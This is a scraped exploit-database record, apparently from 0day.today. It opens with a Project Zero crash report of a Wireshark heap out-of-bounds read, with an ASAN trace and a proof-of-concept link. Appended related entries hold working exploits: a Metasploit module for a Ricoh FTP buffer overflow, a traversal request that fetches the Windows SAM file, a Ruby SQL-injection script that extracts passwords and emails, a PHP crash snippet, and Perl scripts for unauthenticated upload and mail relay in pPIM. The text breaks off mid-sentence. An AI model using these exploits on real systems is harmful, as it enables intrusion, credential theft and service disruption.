Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read
2016-05-13T00:00:00
ID 1337DAY-ID-26008 Type zdt Reporter Google Security Research Modified 2016-05-13T00:00:00
Description
Exploit for multiple platform in category dos / poc
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740
The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0
READ of size 16385 at 0x61b00001335c thread T0
#0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438
#1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)
#2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32
#3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21
#4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13
#5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21
#6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9
#7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10
#8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9
#10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
#11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11
#12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9
#14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8
#15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8
#16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3
#17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#18 0x52eebb in process_packet wireshark/tshark.c:3748:5
#19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11
#20 0x51e4bc in main wireshark/tshark.c:2213:13
0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)
allocated by thread T0 here:
#0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2
#3 0x5244dd in cf_open wireshark/tshark.c:4215:9
#4 0x51decd in main wireshark/tshark.c:2204:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy
Shadow bytes around the buggy address:
0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8910==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip
# 0day.today [2018-04-13] #
{"sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0\r\nREAD of size 16385 at 0x61b00001335c thread T0\r\n #0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438\r\n #1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)\r\n #2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32\r\n #3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21\r\n #4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13\r\n #5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21\r\n #6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9\r\n #7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10\r\n #8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3\r\n #17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #18 0x52eebb in process_packet wireshark/tshark.c:3748:5\r\n #19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11\r\n #20 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x5244dd in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51decd in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==8910==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip\n\n# 0day.today [2018-04-13] #", "history": [], "description": "Exploit for multiple platform in category dos / poc", "sourceHref": "https://0day.today/exploit/26008", "reporter": "Google Security Research", "href": "https://0day.today/exploit/description/26008", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "cdc2aa401057df1e80c0829fd5fd09a7"}, {"key": "href", "hash": "a8a015bd6106138e733d10c90da401cc"}, {"key": "modified", "hash": "d4d064cfe0e4042b38911306aeefc42e"}, {"key": "published", "hash": "d4d064cfe0e4042b38911306aeefc42e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "81a8aed471c1b3b06ec573646a85f0f9"}, {"key": "sourceData", "hash": "d8a71c7972bf6f44e76d81eab4136574"}, {"key": "sourceHref", "hash": "f5e40f47bad6840f4dc8fa136a961873"}, {"key": "title", "hash": "4cd01baa98fff5a152e283cf643657ce"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 6, "references": [], "lastseen": "2018-04-13T07:50:41", "published": "2016-05-13T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-26008", "hash": "ceded8df522e7fe00786c889c197c59e0c86e1be00e07e061c23872c833b04fc", "modified": "2016-05-13T00:00:00", "title": "Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-04-13T07:50:41"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-18426", "1337DAY-ID-17818", "1337DAY-ID-16385", "1337DAY-ID-12175", "1337DAY-ID-4883", "1337DAY-ID-4215", "1337DAY-ID-3748", "1337DAY-ID-3504", "1337DAY-ID-2687", "1337DAY-ID-2213"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26008"]}], "modified": "2018-04-13T07:50:41"}, "vulnersScore": -0.1}}
{"zdt": [{"lastseen": "2018-01-10T09:17:37", "bulletinFamily": "exploit", "description": "Exploit for php platform in category dos / poc", "modified": "2012-06-03T00:00:00", "published": "2012-06-03T00:00:00", "id": "1337DAY-ID-18426", "href": "https://0day.today/exploit/description/18426", "type": "zdt", "title": "PHP 5.3.10 spl_autoload_register() Local Denial of Service", "sourceData": "<?php\r\n#####################################################################\r\n## PHP 5.3.10 spl_autoload_register() Local Denial of Service\r\n## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10\r\n## Date: 02/06/2012\r\n## Local Denial of Service\r\n## Bug discovered by Pr0T3cT10n, <[email\u00a0protected]>\r\n## ISRAEL\r\n## http://www.0x31337.net\r\n#####################################################################\r\n \r\n$buffer = str_repeat(\"A\",9999);\r\nspl_autoload_register($buffer);\r\n \r\n## Or..\r\n# spl_autoload_register($buffer,1,1); #Should work too.\r\n?>\r\n\r\n\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18426"}, {"lastseen": "2018-01-01T07:16:57", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2012-03-24T00:00:00", "published": "2012-03-24T00:00:00", "id": "1337DAY-ID-17818", "href": "https://0day.today/exploit/description/17818", "type": "zdt", "title": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::Ftp\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\r\n service. By supplying a long string of data to the USER command, it is\r\n possible to trigger a stack-based buffer overflow, which allows remote code\r\n execution under the context of the user.\r\n \r\n Please note that in order to trigger the vulnerability, the server must\r\n be configured with a log file name (by default, it's disabled).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Julien Ahrens', #Discovery, PoC\r\n 'sinn3r' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['OSVDB', '79691'],\r\n ['URL', 'http://secunia.com/advisories/47912'],\r\n ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']\r\n ],\r\n 'Payload' =>\r\n {\r\n # Yup, no badchars\r\n 'BadChars' => \"\\x00\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Windows XP SP3',\r\n {\r\n 'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)\r\n 'Offset' => 245\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 1 2012\",\r\n 'DefaultTarget' => 0))\r\n \r\n # We're triggering the bug via the USER command, no point to have user/pass\r\n # as configurable options.\r\n deregister_options('FTPPASS', 'FTPUSER')\r\n end\r\n \r\n def check\r\n connect\r\n disconnect\r\n if banner =~ /220 DSC ftpd 1\\.0 FTP Server/\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(target['Offset'], payload_badchars)\r\n buf << [target.ret].pack('V')\r\n buf << make_nops(20)\r\n buf << payload.encoded\r\n \r\n print_status(\"#{rhost}:#{rport} - Sending #{self.name}\")\r\n connect\r\n send_user(buf)\r\n handler\r\n disconnect\r\n end\r\nend\r\n \r\n=begin\r\n0:002> lmv m SR10\r\nstart end module name\r\n00400000 00410000 SR10 (deferred) \r\n Image path: C:\\Program Files\\DC Software\\SR10.exe\r\n Image name: SR10.exe\r\n Timestamp: Mon May 19 23:55:32 2008 (483275E4)\r\n CheckSum: 00000000\r\n ImageSize: 00010000\r\n File version: 1.0.0.520\r\n Product version: 1.0.0.0\r\n File flags: 0 (Mask 3F)\r\n File OS: 4 Unknown Win32\r\n File type: 1.0 App\r\n File date: 00000000.00000000\r\n Translations: 0409.04b0\r\n CompanyName: Ricoh Co.,Ltd.\r\n ProductName: SR-10\r\n InternalName: SR-10\r\n OriginalFilename: SR10.EXE\r\n ProductVersion: 1, 0, 0, 0\r\n FileVersion: 1, 0, 0, 520\r\n PrivateBuild: 1, 0, 0, 520\r\n SpecialBuild: 1, 0, 0, 520\r\n FileDescription: SR-10\r\n \r\n \r\nNote: No other DC Software dlls are loaded when SR-10.exe is running, so the most\r\nstable component we can use is msvcrt.dll for now.\r\n=end\r\n\r\n\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17818"}, {"lastseen": "2018-03-13T14:10:42", "bulletinFamily": "exploit", "description": "Exploit for jsp platform in category web applications", "modified": "2011-06-23T00:00:00", "published": "2011-06-23T00:00:00", "id": "1337DAY-ID-16385", "href": "https://0day.today/exploit/description/16385", "type": "zdt", "title": "ManageEngine Service Desk Plus 8.0 Directory Traversal Vulnerability", "sourceData": "Google Dork: ie: intitle:ManageEngine ServiceDesk Plus\"\r\nAuthor: Keith Lee [email\u00a0protected]\r\nSoftware Link: http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe\r\nVersion: 8.0\r\n \r\nDescription:\r\n \r\nDirectory traversal vulnerabilities has been found in ManageEngine\r\nServiceDesk Plus 8.0 a web\r\nbased helpdesk system written in Java.\r\n \r\nThe vulnerability can be exploited to access local files by entering\r\nspecial characters in variables used to create file paths. The attackers\r\nuse \u00ef\u00bf\u00bd../\u00ef\u00bf\u00bd sequences to move up to root directory, thus permitting\r\nnavigation through the file system.\r\n \r\nRequest:\r\nGET http://[webserver\r\nIP]:8080/workorder/FileDownload.jsp?module=agent&&FILENAME=%20..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\repair\\SAM\r\n \r\nThe issue is fixed with Service Pack Build 8012 found in the below link.\r\nhttp://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus_8_0_0_SP-0_12_0.ppm\r\n\r\n\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16385"}, {"lastseen": "2018-04-14T03:49:37", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "1337DAY-ID-12175", "href": "https://0day.today/exploit/description/12175", "type": "zdt", "title": "phpscripte24 Shop System SQL Injection Vulnerability Exploit", "sourceData": "============================================================\r\nphpscripte24 Shop System SQL Injection Vulnerability Exploit\r\n============================================================\r\n\r\n----------------------------Information------------------------------------------------\r\n+Name : phpscripte24 Shop System SQL Injection Vulnerability Exploit\r\n+Autor : Easy Laster\r\n+ICQ : 11-051-551\r\n+Date : 09.05.2010\r\n+Script : phpscripte24 Shop System\r\n+Price : 69.99 ?\r\n+Language :PHP\r\n+Discovered by Easy Laster 4004-security-project.com\r\n+Security Group Undergroundagents and 4004-Security-Project 4004-security-project.com\r\n+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,\r\nKiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,\r\nN00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox.\r\n \r\n---------------------------------------------------------------------------------------\r\n \r\n ___ ___ ___ ___ _ _ _____ _ _\r\n| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_\r\n|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|\r\n |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|\r\n |___| |___| \r\n \r\n \r\n----------------------------------------------------------------------------------------\r\n+Vulnerability : www.site.com/shop/index.php?site=content&id=\r\n----------------------------------------------------------------------------------------\r\n#!/usr/bin/ruby\r\n#4004-security-project.com\r\n#Discovered and vulnerability by Easy Laster\r\nrequire 'net/http'\r\nprint \"\r\n#########################################################\r\n# 4004-Security-Project.com #\r\n#########################################################\r\n# phpscripte24 Shop System SQL Injection Vulnerability #\r\n# Exploit #\r\n# Using Host+Path+userid+prefix #\r\n# demo.com /shop/ 1 user #\r\n# Easy Laster #\r\n#########################################################\r\n\"\r\nblock = \"#########################################################\"\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter host name (site.com)->\"\r\nhost=gets.chomp\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter script path (/forum/)->\"\r\npath=gets.chomp\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter userid (userid)->\"\r\nuserid=gets.chomp\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter prefix (prefix z.b user)->\"\r\nprefix=gets.chomp\r\nprint \"\"+ block +\"\"\r\nbegin\r\ndir = \"index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/\"+ prefix +\"/**/WHERE/**/id=\"+ userid +\"\"\r\nhttp = Net::HTTP.new(host, 80)\r\nresp= http.get(path+dir)\r\nprint \"\\nThe ID is -> \"+(/#####(.+)#####/).match(resp.body)[1]\r\ndir = \"index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,passwort,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/\"+ prefix +\"/**/WHERE/**/id=\"+ userid +\"\"\r\nhttp = Net::HTTP.new(host, 80)\r\nresp= http.get(path+dir)\r\nprint \"\\nThe Password is -> \"+(/#####(.+)#####/).match(resp.body)[1]\r\ndir = \"index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/\"+ prefix +\"/**/WHERE/**/id=\"+ userid +\"\"\r\nhttp = Net::HTTP.new(host, 80)\r\nresp= http.get(path+dir)\r\nprint \"\\nThe Email is -> \"+(/#####(.+)#####/).match(resp.body)[1]\r\nrescue\r\nprint \"\\nExploit failed\"\r\nend\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12175"}, {"lastseen": "2018-04-08T22:57:23", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-02-25T00:00:00", "published": "2009-02-25T00:00:00", "id": "1337DAY-ID-4883", "href": "https://0day.today/exploit/description/4883", "type": "zdt", "title": "pPIM 1.0 Multiple Remote Vulnerabilities", "sourceData": "========================================\r\npPIM 1.0 Multiple Remote Vulnerabilities\r\n========================================\r\n\r\n\r\n- -= pPIM Multiple Vulnerabilities =-\r\n\r\nVersion Tested: pPIM 1.0\r\nVendor notified\r\nAuthor: Justin C. Klein Keane \r\n\r\nDescription\r\n\r\npPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal\r\nInformation Management application written in PHP that can store\r\ncontacts (including their photos), events, links, notes, send and check\r\nemail, and upload files. pPIM came to my attention recently with the\r\npublishing on Milw0rm of exploit code designed to facilitate remote\r\ncommand execution (http://www.milw0rm.com/exploits/8093). As there is a\r\nmilw0rm exploit already posted it is likely malicious users are already\r\nexploiting pPIM. I decided to have a closer look at pPIM and, quite\r\nfrankly, was horrified by what I found. pPIM contains multiple\r\nvulnerabilities, from version information leakage, to system credential\r\ndisclosure, to remote command execution, authentication bypass and cross\r\nsite scripting vulnerabilities. Possibly the only class of\r\nvulnerability pPIM is not exposed to is SQL injection as it doesn't\r\nemploy any database back end. That said, there seemed to be nothing in\r\nthe way of security other than an easily bypassable GET variable check\r\nin the header, present in pPIM. The following is a brief synopsis of my\r\nfindings, although I gave up investigation at after discovering so many\r\nflaws in the application's architecture with respect to security.\r\n\r\nVersion Information Leakage:\r\n\r\nBy calling the URL http://target.tld/ppim/Readme.txt you can view the\r\nversion information of the installed version of pPIM.\r\n\r\nPassword Hash Disclosure:\r\n\r\nBy requesting the URL http://target.tld/ppim/password.dat the password\r\nhash is revealed. Depending on the hashing algorithm used by PHP this\r\ncould be trivially easy to compromise using a password cracking tool\r\nlike John the Ripper.\r\n\r\nUnauthenticated Password Change:\r\n\r\nThere is no authentication protection on the password changing script,\r\nso calling\r\n\r\nhttp://target.tld/ppim/changepassword.php\r\n\r\nwill present an attacker with the password change script and allow\r\npassword reset without confirming the existing password.\r\n\r\nMultiple Authentication Problems:\r\n\r\nBecause the authentication takes place in templates/header.html in an\r\nembedded piece of PHP code, depending on server configuration, this code\r\nmight not be executed. Unless the web server is specifically configured\r\nto execute PHP embeded in HTML files server site the PHP code will\r\ninstead simply be passed back to clients as actual HTML.\r\n\r\nAuthentication bypass is possible by simply appending the GET variable\r\n'login=1' to the URL. For example, to access the Calendar page, calling\r\nthe URL 'http://target.tld/ppim/calendar.php' will redirect the\r\nunauthenticated user to the login page. However, calling the URL\r\n'http://target.tld/ppim/calendar.php?login=1' will allow unauthenticated\r\naccess to the Calendar. Any of the pages in pPIM can be accessed this way.\r\n\r\nArbitrary File Upload\r\n\r\npPIM's upload.php script allows attackers to upload arbitrary scripts of\r\nany type to the target server. To do this using Perl simply create the\r\nfile and upload it using Perl:\r\n\r\n$ echo \"<?php echo phpinfo();?>\" > phpinfo.php\r\n\r\nThe execute the following Perl script:\r\n\r\n#!/usr/bin/perl\r\n#\r\n# pPIM Uploader by Justin C. Klein Keane <[email\u00a0protected]>\r\n# Used to upload the file phpinfo.php to a target pPIM site\r\n# bypassing authentication.\r\n#\r\n# Feb 24, 2009\r\n#\r\nuse LWP::UserAgent;\r\nuse HTTP::Request::Common qw(POST);\r\n\r\n$ua = LWP::UserAgent->new();\r\n$request = HTTP::Request->new();\r\n\r\n$response = $ua->request( POST 'http://target.tld/ppim/upload.php?login=1',\r\n Content_Type => 'form-data',\r\n Content =>\r\n [\r\n 'submitupload' => 'submitupload',\r\n 'userfile' => ['./info.php']\r\n ],\r\n);\r\ndie \"Error: \", $response->status_line unless $response->is_success;\r\n\r\nUnauthorized Email Relay\r\n\r\npPIM's sendmail.php script has absolutely no authentication or\r\nvalidation, allowing anyone with access to the site to relay e-mail.\r\nThe following Perl script will relay email through the pPIM installation:\r\n\r\n#!/usr/bin/perl\r\n#\r\n# pPIM Mailer by Justin C. Klein Keane <[email\u00a0protected]>\r\n# Used to relay mail through any pPIM installation\r\n#\r\n# Feb 24, 2009\r\n#\r\nuse LWP::UserAgent;\r\nuse HTTP::Request::Common qw(POST);\r\n\r\n$ua = LWP::UserAgent->new();\r\n$request = HTTP::Request->new();\r\n\r\n$response = $ua->request( POST 'http://target.tld/ppim/sendmail.php',\r\n Content_Type => 'form-data',\r\n Content =>\r\n [\r\n 'submitemail' => 'submitemail',\r\n 'to' => '[email\u00a0protected]',\r\n 'from' => '[email\u00a0protected]',\r\n 'message' => 'You are just asking for spam!'\r\n ],\r\n);\r\ndie \"Error: \", $response->status_line unless $response->is_success;\r\n\r\nPosting Unauthenticated Notes\r\n\r\nThe notes.php script fails to check authentication before inserting new\r\nnotes. This allows attackers to post notes without even having to\r\nbypass authentication. Similarly no authentication is required to\r\ndelete notes, allowing unauthenticated attackers to clear all stored notes.\r\n\r\nXSS Vulnerability\r\n\r\nNone of the form fields seem to be adequately scrubbed to prevent Cross\r\nSite Scripting (XSS). This vulnerability is endemic throughout the\r\napplication. For instance, creating a note with the title\r\n\"<script>alert('foo');</script>\" causes a JavaScript alert box to pop up\r\nthe word \"foo\" whenever the Notes screen is accessed.\r\n\r\nSystem Credential Exposure\r\n\r\nBecause the Email function stores mailbox information as a flat file it\r\nis easy to disclose system account information. For instance, in pPIM,\r\nif I were to create a new mailbox for root a file called \"root.email\"\r\nwould be created in the email folder. By calling the URL\r\nhttp://target.tld/ppim/email/root.email the following output is exposed\r\nvia web browser:\r\n\r\n<?php\r\n$mailserver = \"localhost\";\r\n$username = \"root\";\r\n$password = \"root_password\";\r\n?>\r\n\r\nThus an attacker that can enumerate (or guess) user accounts for\r\nmailboxes set up via pPIM can easily disclose server location as well as\r\nusernames and passwords. This vulnerability affects all data stored in\r\npPIM - it can be accessed directly via URL call without any form of\r\nauthentication and will expose any material stored in pPIM to users\r\nwithout authentication.\r\n\r\nArbitrary Command Execution\r\n\r\nBy creating a specially crafted link an attacker can run arbitrary\r\ncommands with the privileges of the web server process. By altering the\r\nURL field of a link the data files created can be manipulated. Under\r\nnormal usage a user can create a new link under a group, say the\r\n'test_group' with the name 'testlink', the URL '192.168.0.1' and the\r\ndescription 'test description'. This file is then stored in pPIM's root\r\ndirectory under the links/test_group/ directory as testlink.link.\r\nViewing this file we see:\r\n\r\n$ cat testlink.link\r\n<?php\r\n$url=\"192.168.0.52\";\r\n$name=\"test link\";\r\n$description=\"This is the test link\";\r\n?>\r\n\r\nThis file is included as a 